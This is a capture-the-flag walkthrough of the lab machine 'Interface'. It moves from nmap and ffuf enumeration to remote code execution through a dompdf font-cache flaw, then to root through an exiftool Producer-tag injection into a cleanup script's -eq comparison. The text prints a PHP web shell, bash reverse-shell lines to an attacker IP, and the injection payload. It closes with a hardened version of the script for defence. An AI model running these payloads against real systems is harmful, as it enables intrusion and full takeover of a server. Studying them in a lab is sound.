Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:53 IST
Nmap scan report for 10.10.11.200
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.89 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:53 IST
Nmap scan report for 10.10.11.200
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:89:a0:95:7e:ce:ae:a8:59:6b:2d:2d:bc:90:b5:5a (RSA)
| 256 01:84:8c:66:d3:4e:c4:b1:61:1f:2d:4d:38:9c:42:c3 (ECDSA)
|_ 256 cc:62:90:55:60:a6:58:62:9e:6b:80:10:5c:79:9b:55 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.25 seconds
Fuzzing directories on HTTP did not lead me anywhere, so I requested the / directory in Burp.
Found a subdomain: prd.m.rendering-api.interface.htb
It is also using Next.js on the backend.
I'll add it to my /etc/hosts file.
I'll change the content type to JSON as it is using Next.js.
Still "file not found".
I started to fuzz endpoints.
➜ wordlists ffuf -u "http://prd.m.rendering-api.interface.htb/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -mc all --fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://prd.m.rendering-api.interface.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 0
________________________________________________
[Status: 404, Size: 50, Words: 3, Lines: 1, Duration: 87ms]
* FUZZ: api
I found /api.
I did not find anything inside /api till I used a POST method to fuzz.
Found the html2pdf endpoint:
➜ wordlists ffuf -u "http://prd.m.rendering-api.interface.htb/api/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -mc all --fs 50 -d 'a=a'
________________________________________________
:: Method : POST
:: URL : http://prd.m.rendering-api.interface.htb/api/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
:: Data : a=a
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 50
________________________________________________
[Status: 422, Size: 36, Words: 2, Lines: 1, Duration: 87ms]
* FUZZ: html2pdf
I'll change the content type to JSON and fuzz the parameter name.
➜ Interface ffuf -request requests -request-proto http -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -mc all --fs 36
________________________________________________
:: Method : POST
:: URL : http://prd.m.rendering-api.interface.htb/api/html2pdf
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate
:: Header : Upgrade-Insecure-Requests: 1
:: Header : Host: prd.m.rendering-api.interface.htb
:: Header : DNT: 1
:: Header : Connection: close
:: Header : Content-Type: application/json
:: Data : { "FUZZ":"<p>hasdf</p>" }
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 36
________________________________________________
[Status: 200, Size: 1132, Words: 116, Lines: 77, Duration: 229ms]
* FUZZ: html
I'll copy the PDF to my system and run exiftool against it.
➜ pdf exiftool hello.pdf
ExifTool Version Number : 12.65
File Name : hello.pdf
Directory : .
File Size : 1131 bytes
File Modification Date/Time : 2024:01:29 10:57:46+05:30
File Access Date/Time : 2024:01:29 10:57:48+05:30
File Inode Change Date/Time : 2024:01:29 10:57:46+05:30
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Page Count : 1
Producer : dompdf 1.2.0 + CPDF
Create Date : 2024:01:29 05:26:24+00:00
Modify Date : 2024:01:29 05:26:24+00:00
I'll clone the repo and make some changes.
exploit.css
@font-face {
font-family:'exploitfont';
src:url('http://10.10.14.10/exploit_font.php');
font-weight:'normal';
font-style:'normal';
}
Added this in exploit_font.php:
<?php system($_REQUEST['cmd']); ?>
I'll start a web server on port 80 and request exploit.css, which makes the target fetch exploit_font.php, which eventually gives remote code execution.
➜ exploit git:(main) ✗ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.200 - - [29/Jan/2024 13:18:38] "GET /exploit.css HTTP/1.0" 200 -
10.10.11.200 - - [29/Jan/2024 13:18:38] "GET /exploit_font.php HTTP/1.0" 200 -
dompdf caches the downloaded font as /vendor/dompdf/dompdf/lib/fonts/[family]_[style]_[md5(url)].php, which here is:
/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_aafcdbbbcd76ebb26e18f81199c90866.php
I'll get a reverse shell.
index.html
➜ exploit git:(main) ✗ cat index.html
bash -c "bash -i >& /dev/tcp/10.10.14.10/9001 0>&1"
Got a shell.
I did not see any credentials, so I launched pspy on the target.
I'll take a look at cleancache.sh.
www-data@interface:/opt$ cat /usr/local/sbin/cleancache.sh
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
    if [[ -f "$cfile" ]]; then
        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi
    fi
done
Always look at where we can inject into the script; here it is meta_producer, which comes straight from the file's Producer tag. The if statement compares it with -eq, an arithmetic comparison, so bash evaluates the value as an expression, and that is what makes it vulnerable to code injection.
www-data@interface:/dev/shm$ cat rev.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
www-data@interface:/dev/shm$ chmod +x rev.sh
www-data@interface:/dev/shm$ touch hello
www-data@interface:/dev/shm$ exiftool -Producer='arr[$(/dev/shm/rev.sh)]' hello
1 image files updated
www-data@interface:/dev/shm$ exiftool hello
ExifTool Version Number : 12.55
File Name : hello
Directory : .
File Size : 2.9 kB
File Modification Date/Time : 2024:01:29 12:23:38+00:00
File Access Date/Time : 2024:01:29 12:23:38+00:00
File Inode Change Date/Time : 2024:01:29 12:23:38+00:00
File Permissions : -rw-r--r--
File Type : EXV
File Type Extension : exv
MIME Type : image/x-exv
XMP Toolkit : Image::ExifTool 12.55
Producer : arr[$(/dev/shm/rev.sh)]
Now that our payload is injected into Producer, I'll copy the hello file to /tmp, as /tmp is the cache_directory.
cp hello /tmp
In a minute or two I got a connection on port 9001.
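For comparison, here is the same cleanup check written so that the Producer value can never be evaluated. This is an added example, not the box's cleancache.sh: it keeps the original's exiftool/cut extraction and /tmp default, but replaces the arithmetic -eq with a plain string comparison; the function names and the self-check are mine.

```shell
#!/bin/sh
# Hardened replacement for the Producer check in cleancache.sh (added example,
# not the original script). The original uses `[[ "$meta_producer" -eq "dompdf" ]]`;
# in bash, -eq forces arithmetic evaluation of both operands, so a Producer such
# as 'arr[$(...)]' is expanded and its command substitution runs as the script's
# owner. A string comparison with = only compares bytes and evaluates nothing.

# Returns 0 when the producer string is exactly "dompdf", 1 otherwise.
is_dompdf_producer() {
    [ "$1" = "dompdf" ]
}

# Read the Producer tag and keep its first word, mirroring the original
# script's `cut -d " " -f1`; exiftool output is untrusted data, never code.
producer_of() {
    /usr/bin/exiftool -s -s -s -Producer "$1" 2>/dev/null | cut -d " " -f1
}

# Removes a cached file only if it is a regular file whose Producer is dompdf.
clean_cache_dir() {
    cache_directory="${1:-/tmp}"
    for cfile in "$cache_directory"/*; do
        [ -f "$cfile" ] || continue
        if is_dompdf_producer "$(producer_of "$cfile")"; then
            echo "Removing $cfile"
            rm -- "$cfile"
        fi
    done
}

# Self-check with a constructed malicious Producer value: the comparison must
# reject it AND the embedded command substitution must not have run.
# Returns 0 when the payload was treated as inert text.
injection_is_inert() {
    marker="$(mktemp)"
    rm -f "$marker"
    payload='arr[$(touch '"$marker"')]'
    if is_dompdf_producer "$payload"; then
        return 1
    fi
    [ ! -e "$marker" ]
}
```

Run `injection_is_inert && echo safe` to confirm the marker file is never created; call `clean_cache_dir /path/to/cache` only on a directory you actually intend to sweep.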